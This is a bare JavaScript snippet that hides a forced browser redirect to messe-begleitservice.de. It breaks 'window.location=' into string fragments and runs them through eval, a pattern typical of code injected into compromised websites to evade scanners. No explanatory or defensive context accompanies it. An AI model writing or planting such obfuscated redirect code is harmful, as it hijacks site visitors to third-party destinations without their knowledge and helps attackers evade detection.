var str1="win";
var str2="dow.";
var str3="locat";
var str4="ion=";
var str5="'http://messe-begleitservice.de'";
eval(str1+str2+str3+str4+str5);

